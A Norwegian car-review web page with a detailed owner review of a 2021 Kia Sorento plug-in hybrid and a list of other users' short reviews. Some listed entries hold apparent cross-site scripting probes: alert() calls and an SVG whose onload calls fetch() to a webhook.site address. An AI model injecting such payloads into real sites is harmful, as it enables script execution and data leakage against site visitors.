Hvilken bil ser du etter?

Tilbake til front | Skriv en vurdering
2021 Kia Sorento 1,6 T-GDI PHEV Exclusive SUV Bensin/Batteri

Score 8.8/10

Overraskende mye og moderne utstyr. Hadde de valgt litt mer aluminium eller "edlere" materiale på console istedet for piano lakk kunne det rett og slett vært bmw følelse :) Kjøp den med høyt utstyr for nappa lær seter m/ elektronisk lår støtte, panorama tak og alt det fete utstyret.<br /> <br /> Stor, fin, tøff bil for pengene. Tror ikke det finnes noe tilsvarende ?

Kjøreglede

8 / 10
Batteri/elektronikk midt i bilen langt nede gir overraskende lavt tyngdepunkt til Hybrid SUV å være. Føles ganske "snerten" på veien. Sporer ikke, ligger bra på Norske veier. Føles stille i kupeen. Klart man kunne alltids ønsket seg mer krefter i drivlinjen men den går ganske bra. Skikkelig girkasse på Sorenton. Ikke trinnløs CVT som slurrer og hyler.

Kvalitet/driftssikkerhet

10 / 10
Virker veldig bra, 7 års garanti.

Plass/praktiske løsninger

10 / 10
Stooooor plass inni og kjempe bagasjerom. Velger du 5 seteren er det 890 liter. Helt vilt med plass. Istedet for de to ekstra setene for man et stort, praktisk inndelt rom under dørken. Seter foran og bak kan justeres veldig mye og er veldig komfortable.

Og utrolig mye kult utstyr !

Kia har tilogmed fått plass til reservehjul på denne ! Ikke full size men brukbart hvis man punkterer iallefall.

Økonomi/kostnader

8 / 10
Tror den gir et forutsigbart, lavt bil kostnad over noen år.

Drivstoff/forbruk

8 / 10
Går på luft og kjærlighet. En liten "minus" er bensin motoren starter hvis du aktiverer klima når det er kaldt. Batteriet brukes kun til fremdrift. Men det gjør egentlig ikke så mye for det blir godt og varmt og overskudd går tilbake til batteri. Typisk nå i - 4 bruker den 0.1 på mila med 60 - 70 km rekkevidde på strøm. Kanskje noe mer også for motoren lader batteriet litt underveis samtidig som den varmer.

Hvis batteriet er tomt bruker den ca 0.65 med fornuftig kjøring. Skal du på langtur bytt fra PHEV til HEV når batteriet er 40-70 %.

Flere vurderinger

Citroën e-C4 (2025)

Jeg er foreløpig veldig fornøyd. Har slitt litt med å finne den optimale sittekomforten, men en pute gjorde susen der (jeg er 180 og trengte ekstra korsryggstøtte). Bilens automatikk passer meg ve

Score 9.0

Vurdert av Siri

Aston Martin DB9 GT (2017)

alert("total")

Score 5.0

Vurdert av test

Aston Martin DB9 GT (2017)

totalvurderingtest

Score 5.0

Vurdert av test

Abarth 500e (2024)

Score 10

Vurdert av Bernt

Abarth 500e (2024)

Score 1.0

Vurdert av xxxfooo4

Abarth 500e (2024)

xxxfooo4

Score 3.0

Vurdert av xxxfooo4

Abarth 500e (2024)

<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>

Score 6.2

Vurdert av Bernt

Volvo EX40 (2026)

Dette er ikke en volvo som vi er kjent med volvo. Dårlige seter, umulig å opprettholde 20grader i kupe på vinter, kjapp på gasspedal, men enormt strømforbruk uansett hvordan du prøver å tilpass

Score 1.6

Vurdert av Jorsalfar1996

Ford Explorer EV (2025)

Kommer nok til å bytte den ut pga den nervøse oppførselen på vinterføre. Utenom dette svarer den godt på alle parametre.

Score 8.2

Vurdert av Adams

Ford Kuga (2021)

Forbruk. Gir en tier for forbruk langkjøring. 0,44 og forbruk 0,8 med campingvogn, totalvekt 1400 kg(ved tomt batteri). Rekkevidde elektrisk på vinter månedene er fra 20 - 30 km, blandet/bykjøring

Score 8.6

Vurdert av Viggo

Hongqi E-HS9 (2022)

Den er utrolig komfortabel, stille og har en kvalitet som overgår det meste på markedet. Har hatt bilen i 2år nå, å hele familien elsker bilen!

Score 8.2

Vurdert av MrP85

Mercedes-Benz EQC (2022)

Topp komfort og driftsikker.

Score 9.4

Vurdert av Renna

Polestar 2 (2022)

God kvalitetsfølelse. Gode (frem-) seter. Smart med OTA (oppdateringer over-the-air). Lett å selv restarte system og app etter behov. Pen bil! Praktisk med frunk for elkabler på langtur. (hvorfor h

Score 8.8

Vurdert av Autofilen

Mercedes-Benz GLE (2020)

Skuffende å måtte skifte opphengskuler foran på begge sider etter kun 75000 km

Score 9.6

Vurdert av Hans

BMW 3-Serie (2012)

Hadde det vært et punkt som het eierglede så hadde jeg glatt gitt 10 av 10!! Bilen er vakker og tvers igjennom godt bygget! Nydelig å kjøre og det meste bærer preg av å være bygget med gode mat

Score 8.8

Vurdert av Knappertappen